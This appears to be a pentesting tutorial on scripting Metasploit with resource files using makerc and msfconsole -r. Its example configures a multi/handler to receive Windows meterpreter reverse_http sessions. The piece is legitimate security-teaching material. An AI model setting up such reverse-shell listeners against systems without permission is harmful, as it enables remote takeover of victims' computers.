In this series, I have been trying to familiarize you with the many features of the world’s best framework for exploitation, hacking, and pentesting, Metasploit. There are so many features, and techniques for using those features, that few pentesters/hackers are aware of all of them.
Many times, when doing a pentest/hack, we need to run a number of Metasploit commands repeatedly. These commands may be exactly the same each time, and just like scripting, we may need to automatically run multiple Metasploit commands in a single step. Metasploit has the capability to save and store these “scripts,” and they can then be recalled by the script name. Metasploit calls these scripts resource files.
For example, in many attacks, we need to set up a multi/handler to connect to when a payload is executed on a target system. In my new Powersploit series, or with the web delivery Metasploit module, we will always need to set a multi/handler to receive the connections from a sent payload. This usually involves several commands: using the multi/handler, setting the port, setting the payload, setting the IP, an so on. To make things easier, we can store all of these commands in a resource file and simply run a single command to execute all of them.
Now that you have a better idea of when these would be useful, let’s take a look at Metasploit’s scripting capabilities with resource files.
Step 1: Exploring Resource Scripts in Metasploit
First, let’s take a look at where Metasploit store its scripts. Let’s navigate to/usr/share/metasploit-framework/scripts/resources, and then do a long listing.
kali > cd /usr/share/metasploit-framework/scripts/resource
kali > ls -l
As you can see, Metasploit has numerous scripts already developed and stored here. Any new script that we write will be stored here as well.
Step 2: Writing Our Own Resource Script
Now let’s create our own simple script to start a multi/handler necessary to receive connections, such as we used in the first Powersploit tutorial. First, start Metasploit, then enter the commands we want in our script.
kali > msfconsole
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_http
msf > set LHOST 192.168.181.128
msf > set LPORT 4444
When we have completed all of the commands we want in the script, we simply use the keyword makerc followed by the name of the script. For instance, here I named the script, handler_http.rc (a multi/handler for HTTP followed by the Metasploit extension for resource files, rc).
msf > makerc handler_http.rc
Metasploit now saves each of those commands into that script file.
Step 3: Checking the Script Contents
If we want to see want commands are in a script file, we can use one of the many commands in Linux to display the contents of a file, such as cat, less, and more. Here, I used more followed by the resource file name.
msf > more handler_http.rc
Notice that Metasploit now displays the commands in my script file, handler_http.rc.
Step 4: Executing Our New Script File
When we want to execute this script, we simply precede the script name with the keyword resource such as:
msf > resource handler_http.rc
Metasploit will now run each of the commands in our script automatically. Now simply type exploit to start our handler.
msf > exploit
Step 5: Checking Whether It Was Saved
If we go back to the location where the scripts are stored, we can see that our new script, handler_http.rc, is now stored with the other Metasploit prepackaged scripts.
Step 6: Starting the Script Automatically with Metasploit
If we know before starting Metasploit that we will be using a particular script, we can have Metasploit automatically execute the script upon starting. We do this by starting Metasploit with the msfconsole command, the -r switch, and followed by the name of the resource file we want to execute upon opening, such as:
kali > msfconsole -r handler_http.rc
Now, when Metasploit starts, it will automatically execute the handler_http.rc script, and you are ready to go.